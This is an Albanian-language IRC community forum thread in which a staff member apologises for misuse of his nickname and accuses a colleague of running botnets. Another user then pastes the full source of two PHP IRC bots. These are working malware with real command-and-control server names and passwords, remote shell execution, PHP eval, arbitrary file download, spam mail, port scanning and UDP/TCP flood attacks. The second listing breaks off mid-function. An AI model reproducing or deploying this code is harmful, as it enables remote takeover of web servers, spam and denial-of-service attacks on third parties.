Kerkese faljeje nga stafi.

[c0d3r]

Duke u nisur nga nje rremuje e madhe me ritme te shpejta, qe kane perballur Founderin e kanalit Albaguard me vendimarrjen ne ceshtje thelbesore te drejte per nickname tim, ju sqaroj:

E para di gjithcka se cfare eshte bere ne network nga ana e nickname tim parmbreme dhe me vjen keq qe ne 10 vjet sot per here te pare une po pranoj nje gabim qe edhe pse indirekt nga ana e nickname tim ka shkaktuar nje vorbull mosmarrveshjeje dhe acaruese me koleget e mi.

Ju sqaroj se, diten qe ka ndodhur incidenti ne lidhje me botnet qe kane sulmuar serverin dhe ofendimet ndaj founderit une nuk kam qene prezent ne kompiuter madje nuk kam qene prezent as ne Tirane ku jetoj, pasi nisur nga puna qe kam detyrohem qe te leviz dhe jashte saj.Ate dite kam qene me nje sherbim ne Tropoje.Por dua te them se sic e dini te gjithe kompiuteri im rri 24 ore hapur dhe emri im rri online.Per fat te keq nje kusheri i imi i cili eshte jo me shume se 16 vjec, ka perdorur nickname tim duke e shperdoruar punen nder vite dhe duke bere qe cdo koleg i imi te humbe besimin ke mua.
Lenia e passwordeve ne nje folder te vecante nga ana ime ka bere qe ai te identifikohet me nickname tim dhe si kalama te filloj e te shese mend se kush eshte duke sulmuar serverin me botnet, klone, ofendime te tjera dhe gjithcka qe bie ndesh me rregulloren e stafit tone.

Per me shume info, Founder me ka marre ne telefon ne numrin tim celular duke me pyetur se cfare po beja dhe pse po sillesha ashtu pasi vertet u beme kohe qe frekuentojme kete server si staf drejtues dhe ishte dicka e habitshme qe c0d3r qe ka 10 vjet e nuk ka abuzuar te behet brenda 1 dite i keq.
Une jam habitur per vete por i thashe se nuk jam une pasi nuk jam ne tirane por ne Tropoje dhe nuk e di se cfare ka ndodhur.Me ka thene qe nese jam ne Tropoje ta merrja tek numri i tij me nje numer nga qyteti i Tropojes qe te besonte nese isha vertet aty apo jo.Menjehere e kam telefonuar me nje telefon me prefiks te qytetit te Tropojes dhe kam sqaruar gjithcka.

Pra ju lutem besoni qe nuk ka qene c0d3r qe ju njihni si SOP prej kohesh ate dite qe kane ndodhur sulme dhe sharje ndaj founderit ne kanal, por nje kusheri i imi i cili sic ju thashe me siper eshte vetem 16 vjec dhe sdo gezojeme kurre rrespekt nga ana ime.

Sot te vjedh nickname neser te vjedh portofolin....

Gjithsesi un nuk po e shkruaj kete teme per te me falur dhe per te bere djalin e mire qe te me pergezojne e te thone he me se gjynah c0d3r, por thjesht dua ti beje te ditur si atyre qe gezojne rrespekt per mua si atyre qe nuk gezojne qe une jam ai qe ka qene dhe Founder i kanalit ka qene dhe ngelet miku im me i mire.Koleget e tjere besoj se duhet te me kuptojne.

Edhe njehere panvaresisht se nuk kam qene une ate dite online por dikush tjeetr me emrin tim, me sinqeritetin me te madh ju kerkoj ndjese duke pranuar kete gabim fatal.Denimin e keni ju te tere ne dore te cilin do e mirepres me ndershmeri.

Faleminderit.

[l3and3r]

Ju jeni nje nga elitat me te vjetra te albasoul qe te gjithe se bashku kemi arritur te mbajme dicka qe eshte krijuar bukur duke bashkepunuar me njeri tjetrin.Me sqaruan dhe mua qe nuk ke qene ti ai qe ka bere ato gabime.Nuk ka nevoje per kaq shkrim te gjate sepse ata qe te njohin e dine kush je.Nje here ne 10 vjet qe ke gabur ti, te falet si me dashje si pa dashje.
ky eshte mendimi im sepse ste ka terhequr njeri veshin kur ke qene ne moshe me te vogel e jo me sot qe mesa di une duhet te jesh i madh ne moshe.Me vjen keq per ate qe ndodhi po e di qe ska qene dora jote sepse ti ke sjellur gjithmone fryme profesioniste , te embel ne staf dhe drite paqesore

[hari_sweet]

C0d3r un jam 8 vite ne kete embleme qe ne e quajm Albasoul dhe ashtu sic edhe ti me shum se mua . Ne tere kete kohe skam pare te besh ndonje budallik ndaj serverit por ndaj aop-ave po , por te cilat te vogla me korigjim . Sa per rastin ne fjal eshte shum absurde qe kerkon falje ne shkalle te tille perderisa ke folur me Founderin Albaguard dhe ai ka pare qe ke qen ne tropoje uhabet i zgjidhur . Sa per ate qe dikush ka hyre me pss tend shum e rende por te falet se ke dhen shum per kete server dhe meriton cdo gje .



Nje gje tjeter me shqeteson mua qe ska lidhje fare me kete dje kush fuste clone me nick te albaguard ! ke ndonje pergjigje te me japesh ?


Me respekt : Harisi
Mire se te kthehesh .

[c0d3r]

Pervec miqve te mi, kushdo tjeter mund ta kete bere po une jo.Madje eshte jasht absurditetit llogjik per ju qe me njihni qe une te ofendoj Albaguard pasi te gjithe e dini qe e kam mik prej vitesh.

[ixnpeL]

.................................................. ................

[c0d3r]

Po pse mor femije i mitur, ti je ai "kryeminister" qe do percash stafin tone kompakt me te mira e me tekeqija qe kemi kaluar neper vite ???

Te hedhesh gurin dhe te mcefesh doren me mua duke menduar se po fiton dicka duke i bere keq te tjereve eshte e padrejte.

Meqe po shoh shume njerez qe po lakojne emrin tim tek foudneri i kanalit panvaresusht se une edhe indirekt ne gabim kam kerkuar falje ather po ju jap prova per nje Aop se sa pervers dhe mashtrues eshte ne syrin tuaj.

Mund te them qe ka gisht ai ne kete mes po une nuk para flas shume.Po jau le juve te hapni syte.

Ne kete staf marredheniet midis kolegeve quhen virtuale po gjithmone kane lidhje me realitetin.
Mar shkas qe te raportoj nje veprim shume te hidhur persa i perket nje Aop te stafit i cili mban nickname Killer, nje femije 10 vjec qe pin sise akoma para se te flej gjume, i cili indirekt ka sjelle mosmarreveshje midis kolgeve duke hedhur gurin dhe duke mcefur doren.

LEXONI :


Shembulli i meposhtem eshte nje script i cili lodon Skanera ne internet per te shtuar botet e personit qe i posedon (me sakte Botmaster) E ci duhen nje Aop shembullor si Killer keto lloj Botesh ??? Pse linku duhet te mbaje emrin franci ne fund? Mos valle Franci eshte bashkepunetor me Killer ne lidhje em sulmet qe i jane bere networkut tone ?

Faqja e referimit : http://kukesii.t35.com/franci.txt??

Pse valle faqja ka emrin kukesi ? Ke kemi nga kukesi ne staf ? po te lexosh
scriptin lexon qe administrator ose me sakte botmaster i ketij scripti eshte nickname blini.


Shembulli i meposhtem mare nga studimi i faqes eshte serish nje skaner per botnet i cili mban si administrator nickname Blini.

Faqja e Referimit http://kukesii.t35.com/albanian.txt??

Shembulli i meposhtem eshte nje script i cili fatkeqesisht eshte programuar per te loduar botnete ne serverin Albasoul me nick Drago Vdeksh?

Faqja e Referimit : http://kukesii.t35.com/drag.txt??

Scripti i meposhtem ka te beje me nje emer qe ju e njihni se cka bere dhe ca ben ne serverin tone, quhet Eno. E pse valle ky Eno duhet te kete aksesim ne faqen e nje Aop tonit ?? Mos ndoshta bashkepunon per flood dhe sulme ??

Faqja e Referimit : http://kukesii.t35.com/eno.txt??


Urdheroni dhe listen e disa vulnetare qe lodohen botnete

http://kukesii.t35.com/lista14.txt??

ATA QE DINE DHE MARRIN VESH NGA KODET PHP E KUPTOJNE MIRE DHE MUND TE JAPIN PROVA DIREKTE SE KUSH ESHTE ADMINISTRATORI I KETYRE SCRIPTEVE, KUSH ESHTE BOTMASTER DHE NE FUND KOMENTIN E TYRE.


Me vjen keq qe postoj gjera te tilla ne kete forum pasi asnjehere forumi ska pasur karakter te tille, po tipa si puna e Killer duhet te dine qe ne jemi rritur ne kete network dhe sa per dijeni me tipa qe hedhin gurin e mcefin doren ne i gjejme dhe miun e shtepise se ku e ka.

Kaq kisha dhe me falni dhe njehere.thjesht mendoni pse kjo faqe ka emrin kukesii dhe jo vlora dhe pse emrin e administratorit e ka blini e jo emer tjeter.Sa per info faqja eshte Free dhe nuk ka shans njeri qe ta vjedhe ose ta beje Hack.Pergjegjesia ne kete rast nuk do ngele jetime.Ftoj te gjithe Aop dhe Sop tane te vjeter te studjojne kodet dhe te japin pergjigje.

[l3and3r]

ohh my god that's a funky shit c0d3r nder vite une e kam pergezuar punen tende pasi ti me se miri je i pergatitur ne cdo fushe persa i perket fjales internet.une marr vesh nga kodet dhe mesa pashe ne ato faqe rezulton se Botmaster eshte nickname Blini, dhe botet komandohen nga nje server tjeter vetem me emrin e atij duke marre akses nga kjo faqe
gjithashtu eshte te tjerat i kam pare dhe me rezulton qe gjithcka qe ke thene me siper eshte ne emer te Blini.Nuk besoja se mund te kishte kaq shume scripte por ja qe i paska.Me vjen keq qe e kemi nenvleftesuar dhe kemi kujtuar qe eshte kalama, po ai vazhdon te jete akoma nje floodist dhe nje armik i stafit he i serverit tone

[l3and3r]

Nga frika qe ti blini te fshish filet ja ku i ke


<?

set_time_limit(0);
error_reporting(0);

class pBot
{
var $config = array("server"=>"irc.albasoul.com",
"port"=>6667,
"pass"=>"", //
"prefix"=>"",
"maxrand"=>7,
"chan"=>"#shqiperia",
"key"=>"142536", //
"modes"=>"-x+i",
"password"=>"albhack", //
"trigger"=>"!say@",
"hostauth"=>"*" // *
);
var $users = array();
function start()
{
if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30)))
$this->start();
$ident = "";
$alph = range("a","z");
for($i=0;$i<$this->config['maxrand'];$i++)
$ident .= $alph[rand(0,25)];
if(strlen($this->config['pass'])>0)
$this->send("PASS ".$this->config['pass']);
$this->send("USER $ident 127.0.0.1 localhost :$ident");
$this->set_nick();
$this->main();
}
function main()
{
while(!feof($this->conn))
{
$this->buf = trim(fgets($this->conn,512));
$cmd = explode(" ",$this->buf);
if(substr($this->buf,0,6)=="PING :")
{
$this->send("PONG :".substr($this->buf,6));
}
if(isset($cmd[1]) && $cmd[1] =="001")
{
$this->send("MODE ".$this->nick." ".$this->config['modes']);
$this->join($this->config['chan'],$this->config['key']);
}
if(isset($cmd[1]) && $cmd[1]=="433")
{
$this->set_nick();
}
if($this->buf != $old_buf)
{
$mcmd = array();
$msg = substr(strstr($this->buf," :"),2);
$msgcmd = explode(" ",$msg);
$nick = explode("!",$cmd[0]);
$vhost = explode("@",$nick[1]);
$vhost = $vhost[1];
$nick = substr($nick[0],1);
$host = $cmd[0];
if($msgcmd[0]==$this->nick)
{
for($i=0;$i<count($msgcmd);$i++)
$mcmd[$i] = $msgcmd[$i+1];
}
else
{
for($i=0;$i<count($msgcmd);$i++)
$mcmd[$i] = $msgcmd[$i];
}
if(count($cmd)>2)
{
switch($cmd[1])
{
case "QUIT":
if($this->is_logged_in($host))
{
$this->log_out($host);
}
break;
case "PART":
if($this->is_logged_in($host))
{
$this->log_out($host);
}
break;
case "PRIVMSG":
if(!$this->is_logged_in($host) && ($vhost == $this->config['hostauth'] || $this->config['hostauth'] == "*"))
{
if(substr($mcmd[0],0,1)==".")
{
switch(substr($mcmd[0],1))
{
case "user":
if($mcmd[1]==$this->config['password'])
{
$this->privmsg($this->config['chan'],"[\2AsC.Fieri\2]: Passwordi U Pranua.");
$this->log_in($host);
}
else
{
$this->privmsg($this->config['chan'],"[\2Asc.Fieri\2]: Passwordi Jo I Rregullt.");
}
break;
}
}
}
elseif($this->is_logged_in($host))
{
if(substr($mcmd[0],0,1)==".")
{
switch(substr($mcmd[0],1))
{
case "restart":
$this->send("QUIT estart");
fclose($this->conn);
$this->start();
break;
case "mail": //mail to from subject message
if(count($mcmd)>4)
{
$header = "From: <".$mcmd[2].">";
if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]),$header))
{
$this->privmsg($this->config['chan'],"[\2MAIL\2]: Nuk Mund Te Dergohej");
}
else
{
$this->privmsg($this->config['chan'],"[\2MAIL\2]: Mesazhi Eshte Derguar Me Sukses Tek \2".$mcmd[1]."\2");
}
}
break;
case "dns":
if(isset($mcmd[1]))
{
$ip = explode(".",$mcmd[1]);
if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3]))
{
$this->privmsg($this->config['chan'],"[\2DNS\2]: ".$mcmd[1]." => ".gethostbyaddr($mcmd[1]));
}
else
{
$this->privmsg($this->config['chan'],"[\2DNS\2]: ".$mcmd[1]." => ".gethostbyname($mcmd[1]));
}
}
break;
case "info":
$this->privmsg($this->config['chan'],"[\2INFO\2]: [\2httpd\2: ".$_SERVER['SERVER_SOFTWARE']."] [\2docroot\2: ".$_SERVER['DOCUMENT_ROOT']."] [\2domain\2: ".$_SERVER['SERVER_NAME']."] [\2admin\2: ".$_SERVER['SERVER_ADMIN']."] [\2url\2:".$_SERVER['REQUEST_URI']."]");
break;
case "cmd":
if(isset($mcmd[1]))
{
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$this->privmsg($this->config['chan'],"[\2cmd\2]: $command");
$pipe = popen($command,"r");
while(!feof($pipe))
{
$pbuf = trim(fgets($pipe,512));
if($pbuf != NULL)
$this->privmsg($this->config['chan']," : $pbuf");
}
pclose($pipe);
}
break;
case "rndnick":
$this->set_nick();
break;
case "raw":
$this->send(strstr($msg,$mcmd[1]));
break;
case "php":
$eval = eval(substr(strstr($msg,$mcmd[1]),strlen($mcmd[1])));
break;
case "exec":
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = shell_exec($command);
$ret = explode("\n",$exec);
$this->privmsg($this->config['chan'],"[\2EXEC\2]: $command");
for($i=0;$i<count($ret);$i++)
if($ret[$i]!=NULL)
$this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;
case "pscan": // .pscan 127.0.0.1 6667
if(count($mcmd) > 2)
{
if(fsockopen($mcmd[1],$mcmd[2],$e,$s,15))
$this->privmsg($this->config['chan'],"[\2pSCAN\2]: ".$mcmd[1].":".$mcmd[2]." is \2open\2");
else
$this->privmsg($this->config['chan'],"[\2pSCAN\2]: ".$mcmd[1].":".$mcmd[2]." is \2closed\2");
}
break;
case "ud.server": // .udserver <server> <port> [password]
if(count($mcmd)>2)
{
$this->config['server'] = $mcmd[1];
$this->config['port'] = $mcmd[2];
if(isset($mcmcd[3]))
{
$this->config['pass'] = $mcmd[3];
$this->privmsg($this->config['chan'],"[\2UPDATE\2]: Server was Changed to ".$mcmd[1].":".$mcmd[2]." Pass: ".$mcmd[3]);
}
else
{
$this->privmsg($this->config['chan'],"[\2UPDATE\2]: Server was Changed to ".$mcmd[1].":".$mcmd[2]);
}
}
break;
case "download":
if(count($mcmd) > 2)
{
if(!$fp = fopen($mcmd[2],"w"))
{
$this->privmsg($this->config['chan'],"[\2DOWNLOAD\2]: Can not download, permission denied.");
}
else
{
if(!$get = file($mcmd[1]))
{
$this->privmsg($this->config['chan'],"[\2DOWNLOAD\2]: Unable to download from \2".$mcmd[1]."\2");
}
else
{
for($i=0;$i<=count($get);$i++)
{
fwrite($fp,$get[$i]);
}
$this->privmsg($this->config['chan'],"[\2DOWNLOAD\2]: File \2".$mcmd[1]."\2 was downloaded to \2".$mcmd[2]."\2");
}
fclose($fp);
}
}
break;
case "die":
$this->send("QUIT iE Komanda U Perdor Nga $nick");
fclose($this->conn);
exit;
case "logout":
$this->log_out($host);
$this->privmsg($this->config['chan'],"[\2AsC.Fieri\2]: $nick Password have been logged out");
break;
case "udpflood":
if(count($mcmd)>4)
{
$this->udpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4]);
}
break;
case "tcpflood":
if(count($mcmd)>5)
{
$this->tcpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4],$mcmd[5]);
}
break;
}
}
}
break;
}
}
}
$old_buf = $this->buf;
}
$this->start();
}
function send($msg)
{
fwrite($this->conn,"$msg\r\n");

}
function join($chan,$key=NULL)
{
$this->send("JOIN $chan $key");
}
function privmsg($to,$msg)
{
$this->send("PRIVMSG $to :$msg");
}
function is_logged_in($host)
{
if(isset($this->users[$host]))
return 1;
else
return 0;
}
function log_in($host)
{
$this->users[$host] = true;
}
function log_out($host)
{
unset($this->users[$host]);
}
function set_nick()
{
if(isset($_SERVER['SERVER_SOFTWARE']))
{
if(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"apache"))
$this->nick = "Drago[Vdeksh]";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"iis"))
$this->nick = "Drago[Vdeksh]";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"xitami"))
$this->nick = "Drago[Vdeksh]";
else
$this->nick = "Drago[Vdeksh]";
}
else
{
$this->nick = "Drago[Vdeksh]";
}
$this->nick .= $this->config['prefix'];
for($i=0;$i<$this->config['maxrand'];$i++)
$this->nick .= mt_rand(0,9);
$this->send("NICK ".$this->nick);
}
function udpflood($host,$packetsize,$time) {
$this->privmsg($this->config['chan'],"[\2DDOS\2]: Duke Sulmuar $host Per $time Sekonda me $packetsize Kb Paketa");
$packet = "";
for($i=0;$i<$packetsize;$i++) { $packet .= chr(mt_rand(1,256)); }
$timei = time();
$i = 0;
while(time()-$timei < $time) {
$fp=fsockopen("udp://".$host,mt_rand(0,6000),$e,$s,5);
fwrite($fp,$packet);
fclose($fp);
$i++;
}
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'],"[\2DDOS\2]: Mbaroi Sulmimi: $env MB U Derguan. Shpejtesia E Sumimit : $vel MB/s ");
}
function tcpflood($host,$packets,$packetsize,$port,$delay)
{
$this->privmsg($this->config['chan'],"[\2TCP\2]: Sending $packets packets to $host:$port. Packet size: $packetsize");
$packet = "";
for($i=0;$i<$packetsize;$i++)
$packet .= chr(mt_rand(1,256));
for($i=0;$i<$packets;$i++)
{
if(!$fp=fsockopen("tcp://".$host,$port,$e,$s,5))
{
$this->privmsg($this->config['chan'],"[\2TCP\2]: Error: <$e>");
return 0;
}
else
{
fwrite($fp,$packet);
fclose($fp);
}
sleep($delay);
}
$this->privmsg($this->config['chan'],"[\2TCP\2]: Finished sending $packets packets to $host:$port.");
}
}

$bot = new pBot;
$bot->start();

?>

[l3and3r]

dhe tjerat

[l3and3r]

<?

/*
*
* #crew@corp. since 2003
* edited by: devil__ <admin@xdevil.org>
*
* COMMANDS:
*
* .user <password> //login to the bot
* .logout //logout of the bot
* .die //kill the bot
* .restart //restart the bot
* .mail <to> <from> <subject> <msg> //send an email
* .dns <IP|HOST> //dns lookup
* .download <URL> <filename> //download a file
* .exec <cmd> // uses exec() //execute a command
* .sexec <cmd> // uses shell_exec() //execute a command
* .cmd <cmd> // uses popen() //execute a command
* .info //get system information
* .php <php code> // uses eval() //execute php code
* .tcpflood <target> <packets> <packetsize> <port> <delay> //tcpflood attack
* .udpflood <target> <packets> <packetsize> <delay> //udpflood attack
* .raw <cmd> //raw IRC command
* .rndnick //change nickname
* .pscan <host> <port> //port scan
* .safe // test safe_mode (dvl)
* .inbox <to> // test inbox (dvl)
* .conback <ip> <port> // conect back (dvl)
* .uname // return shell's uname using a php function (dvl)
*
*/

set_time_limit(0);
error_reporting(0);
echo "ok!";

class pBot
{
var $config = array("server"=>"irc.mildnet.org",
"port"=>"6667",
"pass"=>"",
"prefix"=>"ASC",
"maxrand"=>"4",
"chan"=>"#php#",
"chan2"=>"#2",
"key"=>"sindrom",
"modes"=>"+p",
"password"=>"albhack",
"trigger"=>".",
"hostauth"=>"*" // * for any hostname (remember: /setvhost xdevil.org)
);

var $users = array();
function start()
{
if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30)))
$this->start();
$ident = $this->config['prefix'];
$alph = range("0","9");
for($i=0;$i<$this->config['maxrand'];$i++)
$ident .= $alph[rand(0,9)];
if(strlen($this->config['pass'])>0)
$this->send("PASS ".$this->config['pass']);
$this->send("USER ".$ident." 127.0.0.1 localhost :".php_uname()."");
$this->set_nick();
$this->main();
}
function main()
{
while(!feof($this->conn))
{
$this->buf = trim(fgets($this->conn,512));
$cmd = explode(" ",$this->buf);
if(substr($this->buf,0,6)=="PING :")
{
$this->send("PONG :".substr($this->buf,6));
}
if(isset($cmd[1]) && $cmd[1] =="001")
{
$this->send("MODE ".$this->nick." ".$this->config['modes']);
$this->join($this->config['chan'],$this->config['key']);

$this->privmsg($this->config['chan'],"c0d3r LINUX BOT");


if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
else { $safemode = "off"; }
$uname = php_uname();
$this->privmsg($this->config['chan2'],"[\2uname!\2]: $uname (safe: $safemode)");
$this->privmsg($this->config['chan2'],"[\2vuln!\2]: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."");
}
if(isset($cmd[1]) && $cmd[1]=="433")
{
$this->set_nick();
}
if($this->buf != $old_buf)
{
$mcmd = array();
$msg = substr(strstr($this->buf," :"),2);
$msgcmd = explode(" ",$msg);
$nick = explode("!",$cmd[0]);
$vhost = explode("@",$nick[1]);
$vhost = $vhost[1];
$nick = substr($nick[0],1);
$host = $cmd[0];
if($msgcmd[0]==$this->nick)
{
for($i=0;$i<count($msgcmd);$i++)
$mcmd[$i] = $msgcmd[$i+1];
}
else
{
for($i=0;$i<count($msgcmd);$i++)
$mcmd[$i] = $msgcmd[$i];
}
if(count($cmd)>2)
{
switch($cmd[1])
{
case "QUIT":
if($this->is_logged_in($host))
{
$this->log_out($host);
}
break;
case "PART":
if($this->is_logged_in($host))
{
$this->log_out($host);
}
break;
case "PRIVMSG":
if(!$this->is_logged_in($host) && ($vhost == $this->config['hostauth'] || $this->config['hostauth'] == "*"))
{
if(substr($mcmd[0],0,1)==".")
{
switch(substr($mcmd[0],1))
{
case "user":
if($mcmd[1]==$this->config['password'])
{
$this->log_in($host);
}
else
{
$this->notice($this->config['chan'],"[\2Auth\2]: Senha errada $nick idiota!!");
}
break;
}
}
}
elseif($this->is_logged_in($host))
{
if(substr($mcmd[0],0,1)==".")
{
switch(substr($mcmd[0],1))
{
case "restart":
$this->send("QUIT estart commando from $nick");
fclose($this->conn);
$this->start();
break;
case "mail": //mail to from subject message
if(count($mcmd)>4)
{
$header = "From: <".$mcmd[2].">";
if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]),$header))
{
$this->privmsg($this->config['chan'],"[\2mail\2]: Impossivel mandar e-mail.");
}
else
{
$this->privmsg($this->config['chan'],"[\2mail\2]: Mensagem enviada para \2".$mcmd[1]."\2");
}
}
break;
case "safe":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{
$safemode = "on";
}
else {
$safemode = "off";
}
$this->privmsg($this->config['chan'],"[\2safe mode\2]: ".$safemode."");
break;
case "inbox": //teste inbox
if(isset($mcmd[1]))
{
$token = md5(uniqid(rand(), true));
$header = "From: <inbox".$token."@xdevil.org>";
$a = php_uname();
$b = getenv("SERVER_SOFTWARE");
$c = gethostbyname($_SERVER["HTTP_HOST"]);
if(!mail($mcmd[1],"InBox Test","#crew@corp. since 2003\n\nip: $c \nsoftware: $b \nsystem: $a \nvuln: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."\n\ngreetz: wicked\nby: dvl <admin@xdevil.org>",$header))
{
$this->privmsg($this->config['chan'],"[\2inbox\2]: Unable to send");
}
else
{
$this->privmsg($this->config['chan'],"[\2inbox\2]: Message sent to \2".$mcmd[1]."\2");
}
}
break;
case "conback":
if(count($mcmd)>2)
{
$this->conback($mcmd[1],$mcmd[2]);
}
break;
case "dns":
if(isset($mcmd[1]))
{
$ip = explode(".",$mcmd[1]);
if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3]))
{
$this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyaddr($mcmd[1]));
}
else
{
$this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyname($mcmd[1]));
}
}
break;
case "info":
case "vunl":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
else { $safemode = "off"; }
$uname = php_uname();
$this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)");
$this->privmsg($this->config['chan'],"[\2vuln\2]: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."");
break;
case "bot":
$this->privmsg($this->config['chan'],"[\2bot\2]: phpbot 2.0 by; #crew@corp.");
break;
case "uname":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
else { $safemode = "off"; }
$uname = php_uname();
$this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)");
break;
case "rndnick":
$this->set_nick();
break;
case "raw":
$this->send(strstr($msg,$mcmd[1]));
break;
case "eval":
$eval = eval(substr(strstr($msg,$mcmd[1]),strlen($mcmd[1])));
break;
case "sexec":
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = shell_exec($command);
$ret = explode("\n",$exec);
for($i=0;$i<count($ret);$i++)
if($ret[$i]!=NULL)
$this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;

case "exec":
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = exec($command);
$ret = explode("\n",$exec);
for($i=0;$i<count($ret);$i++)
if($ret[$i]!=NULL)
$this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;

case "passthru":
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);

$exec = passthru($command);
$ret = explode("\n",$exec);
for($i=0;$i<count($ret);$i++)
if($ret[$i]!=NULL)
$this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;

case "popen":
if(isset($mcmd[1]))
{
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$this->privmsg($this->config['chan'],"[\2popen\2]: $command");
$pipe = popen($command,"r");
while(!feof($pipe))
{
$pbuf = trim(fgets($pipe,512));
if($pbuf != NULL)
$this->privmsg($this->config['chan']," : $pbuf");
}
pclose($pipe);
}

case "system":
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = system($command);
$ret = explode("\n",$exec);
for($i=0;$i<count($ret);$i++)
if($ret[$i]!=NULL)
$this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;


case "pscan": // .pscan 127.0.0.1 6667
if(count($mcmd) > 2)
{
if(fsockopen($mcmd[1],$mcmd[2],$e,$s,15))
$this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2open\2");
else
$this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2closed\2");
}
break;
case "ud.server": // .ud.server <server> <port> [password]
if(count($mcmd)>2)
{
$this->config['server'] = $mcmd[1];
$this->config['port'] = $mcmd[2];
if(isset($mcmcd[3]))
{
$this->config['pass'] = $mcmd[3];
$this->privmsg($this->config['chan'],"[\2update\2]: Server trocado para ".$mcmd[1].":".$mcmd[2]." Senha: ".$mcmd[3]);
}
else
{
$this->privmsg($this->config['chan'],"[\2update\2]: Server trocado para ".$mcmd[1].":".$mcmd[2]);
}
}
break;
case "download":
if(count($mcmd) > 2)
{
if(!$fp = fopen($mcmd[2],"w"))
{
$this->privmsg($this->config['chan'],"[\2download\2]: Nao foi possivel fazer o download. Permissao negada.");
}
else
{
if(!$get = file($mcmd[1]))
{
$this->privmsg($this->config['chan'],"[\2download\2]: Nao foi possivel fazer o download de \2".$mcmd[1]."\2");
}
else
{
for($i=0;$i<=count($get);$i++)
{
fwrite($fp,$get[$i]);
}
$this->privmsg($this->config['chan'],"[\2download\2]: Arquivo \2".$mcmd[1]."\2 baixado para \2".$mcmd[2]."\2");
}
fclose($fp);
}
}
else { $this->privmsg($this->config['chan'],"[\2download\2]: use .download http://your.host/file /tmp/file"); }
break;
case "die":
$this->send("QUIT :die command from $nick");
fclose($this->conn);
exit;
case "logout":
$this->log_out($host);
$this->privmsg($this->config['chan'],"[\2auth\2]: $nick deslogado!");
break;
case "udpflood":
if(count($mcmd)>3)
{
$this->udpflood($mcmd[1],$mcmd[2],$mcmd[3]);
}
break;
case "tcpflood":
if(count($mcmd)>5)
{
$this->tcpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4],$mcmd[5]);
}
break;
}
}
}
break;
}
}
}
$old_buf = $this->buf;
}
$this->start();
}
function send($msg)
{
fwrite($this->conn,"$msg\r\n");

}
function join($chan,$key=NULL)
{
$this->send("JOIN $chan $key");
}
function privmsg($to,$msg)
{
$this->send("PRIVMSG $to :$msg");
}
function notice($to,$msg)
{
$this->send("NOTICE $to :$msg");
}
function is_logged_in($host)
{
if(isset($this->users[$host]))
return 1;
else
return 0;
}
function log_in($host)
{
$this->users[$host] = true;
}
function log_out($host)
{
unset($this->users[$host]);
}
function set_nick()
{
if(isset($_SERVER['SERVER_SOFTWARE']))
{
if(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"apache"))
$this->nick = "[A]";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"iis"))
$this->nick = "[I]";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"xitami"))
$this->nick = "[X]";
else
$this->nick = "[U]";
}
else
{
$this->nick = "[C]";
}
$this->nick .= $this->config['prefix'];
for($i=0;$i<$this->config['maxrand'];$i++)
$this->nick .= mt_rand(0,9);
$this->send("NICK ".$this->nick);
}
function udpflood($host,$packetsize,$time) {
$this->privmsg($this->config['chan'],"[\2UdpFlood Started!\2]");
$packet = "";
for($i=0;$i<$packetsize;$i++) { $packet .= chr(mt_rand(1,256)); }
$timei = time();
$i = 0;
while(time()-$timei < $time) {
$fp=fsockopen("udp://".$host,mt_rand(0,6000),$e,$s,5);
fwrite($fp,$packet);
fclose($fp);
$i++;
}
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'],"[\2UdpFlood Finished!\2]: $env MB enviados / Media: $vel MB/s ");
}
function tcpflood($host,$packets,$packetsize,$port,$delay)
{
$this->privmsg($this->config['chan'],"[\2TcpFlood Started!\2]");
$packet = "";
